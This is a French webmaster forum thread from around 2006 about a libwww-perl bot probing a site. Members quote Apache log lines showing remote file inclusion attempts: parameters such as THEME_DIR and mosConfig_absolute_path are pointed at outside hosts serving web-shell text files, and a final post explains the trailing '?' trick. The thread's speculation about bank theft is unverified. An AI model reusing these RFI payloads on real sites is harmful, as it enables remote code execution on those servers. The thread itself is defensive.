Libwww-perl 5.69 : qu'elle est ce bot de hacker ?

[marion17]

Salut a tous

j'ai un drole de bot nommé Libwww-perl 5.69, qui crawler cette page :

example.com/index.php?path=http://www.bhlynx.org/htdig/UPLOADING/full.gif?

et evidement ça affiche la page d'index


tenez matez ça pour voir : -http://bhlynx.org/

bizarre, vous connaisez ?

Un mec tente de me hacker ? comment le bloquer ?

[Edit kazhar : Inutile de lui faire un lien !]

[ecocentric]

C'est une lib perl pour faire des bots sur mesure. C'est pas forcément du hack, ça peut être nimporte quoi en fait.

[marion17]

pour faire son propre moteur de recherche ?

mais quand on lit les fichier sur le ftp du mec... avec des jargon de hacking.. ca fait peur

[guicara]

Effectivement, l'url que tu as donné fait peur !
Il s'agit, sans aucun doute, de hacking :

La preuve :

-http://bhlynx.org/htdig/hacked.jpg ^^

Ps : quand on regarde les logs, tous est en mouvement

Edit : Attention pas mal de chevauxl de trois !

La preuve :
---> http://www.graphiques-kits.com/images/cheval-3.png

Et encore un !
---> http://www.graphiques-kits.com/images/cheval-3-2.png

Merci Mc Afee !
Bon je vais encore parcourir ce site...

Edit : encore 2 !

[paria]

oui c'est pas très beau, j'étudie et n'avoue ne pas avoir résolue le mystère.

[guicara]

Ahhh !!!

Il s'amuse même a avoir les mots de passe des banques !
-http://bhlynx.org/htdig/sql/Pics/scam.JPG

Dans son fichier texte...

Très grave !!!

[paria]

Il vaut mieux se retirer les gars il s'agit d'une équipe de défaceur, c'est exacte, ils ont du niveaux

j'ai retrouvé des pages défacés dans le cache google, ils utilisent un schellcode avec un scaner de vulnérabilité
-http://72.14.221.104/search?q=cache:TivVV-LKQtMJ:win.intrasys.com.br/imobiliaria/optarimoveis.com.br/admin/
-http://72.14.221.104/search?q=cache:rUxy6Ps0VEwJ:europass.oeek.gr/index.php%3Foption%3Dcom_content%26task%3Dview%26id%3D12%26Itemid%3D19%26lang%3

[marion17]

Il vaut mieux se retirer les gars il s'agit d'une équipe de défaceur, c'est exacte, ils ont du niveaux

j'ai retrouvé des pages défacés dans le cache google, ils utilisent un schellcode avec un scaner de vulnérabilité
-http://72.14.221.104/search?q=cache:TivVV-LKQtMJ:win.intrasys.com.br/imobiliaria/optarimoveis.com.br/admin/
-http://72.14.221.104/search?q=cache:rUxy6Ps0VEwJ:europass.oeek.gr/index.php%3Foption%3Dcom_content%26task%3Dview%26id%3D12%26Itemid%3D19%26lang%3

J'ai pas tous compris, c'est quoi schellcode avec un scaner de vulnérabilité ? dans qu'elle but ?

guicara merci d'avori tester tous ça

visiblement il on detecté que on fouiller dans les fichier, il n'y a plus rien dans le dossier -http://bhlynx.org/htdig/ , il on du paniquer et tout effacer

On ai dans le grand banditisme du web vous pensez la ?

[guicara]

On ai dans le grand banditisme du web vous pensez la ?

Quand je vois qu'ils sont sur un site d'une banque, logué surment à un compte piraté, je dis oui, j'ai sauvegarder l'imprime écran sur mon dd ^^

[marion17]

On ai dans le grand banditisme du web vous pensez la ?

Quand je vois qu'ils sont sur un site d'une banque, logué surment à un compte piraté, je dis oui, j'ai sauvegarder l'imprime écran sur mon dd ^^

Ben punaise....

En tous cas leurs bot n'ai plus repasser sur mon site depuis que j'ai poster ce message, il on du voir le referer de ce topic certainement.... et comprendre certains mot de Français...
T'a bien fait de sauvegarder des données !

[guicara]

La preuve de ce que j'avance :
http://guillaume.interordi.free.fr/images/scam.JPG

[karan]

Je confirme. Base MySQL mise KO pendant 45 minutes dans la nuit du 24 décembre.

200.24.106.14 - - [02/Dec/2006:09:26:47 -0500] "GET /forum/archive/index.php/examples/index.php?send=devilteam&script=http://www.chopstickz.net/xo/cmd.do? HTTP/1.1" 302 345 "-" "libwww-perl/5.65"

212.227.118.59 - - [04/Dec/2006:04:18:55 -0500] "GET /forum/archive/index.php/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.sohbetalevi.com/lol1.txt? HTTP/1.1" 302 280 "-" "libwww-perl/5.64"

209.97.196.230 - - [04/Dec/2006:04:18:56 -0500] "GET /forum/archive/index.php/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.sohbetalevi.com/lol1.txt? HTTP/1.1" 302 280 "-" "libwww-perl/5.805"
89.108.66.115 - - [20/Dec/2006:06:59:24 -0500] "GET /forum/archive/index.php/tools/send_reminders.php?includedir=http://www.tambenlik.net/lol1.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"
194.135.81.30 - - [23/Dec/2006:10:06:42 -0500] "GET /forum/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://filizakin.org/lmr.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"

70.86.21.194 - - [24/Dec/2006:03:25:08 -0500] "GET /forum/archive/index.php/inc/cmses/aedatingCMS.php?dir[inc]=%20inurl:%22flashchat%22+site:frhttp://filizakin.org/lmr.txt? HTTP/1.1" 200 5783 "-" "libwww-perl/5.805"

72.232.77.106 - - [24/Dec/2006:03:25:10 -0500] "GET /forum/index.php?menu=deti&page=%20allinurl:%22index.php?menu=deti&page%22http://filizakin.org/lmr.txt? HTTP/1.1" 200 73494 "-" "libwww-perl/5.805"

Database error xxxxxxxxxxx:

mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (11)
/xxxxxxxxxxxxxxxxxxxxxxxx/public_html/forum/includes/class_core.php on line 273

MySQL Error :
Error Number :
Date : Sunday, December 24th 2006 @ 03:22:19 AM
Script : http://www.xxxxxxxxxxxxxxxxxxxx/archive ... rg/lmr.txt?
Referrer :
IP Address : 72.232.108.42

Portez plainte à votre hébergeur et à leur FAI. S'ils font du dégat, étudiez la possibilité d'une action en justice.

[marion17]

La preuve de ce que j'avance :
http://guillaume.interordi.free.fr/images/scam.JPG

ben dit donc, impressionant !

karan tu a était victime du meme bot toi alors ?

[guicara]

Maintenant que j'ai posté sur ce topic et mis en évidence quelques imprime écran, j'ai peur pour mon site

Au moins sa va tester la sécurité de mes scripts Php
Allé hop une petite sauvegarde mysql...

[rog]

path=http://www.bhlynx.org/htdig/UPLOADING/full.gif?

==> scanner de vulnerabilité par RFI (remote file inclusion)

en regle generale quand l'extension n'est pas interprétée par le server (full.gif?)
c'est un web shell

et le " ? " coupe la variable d'une possible concatenation dans le path

rog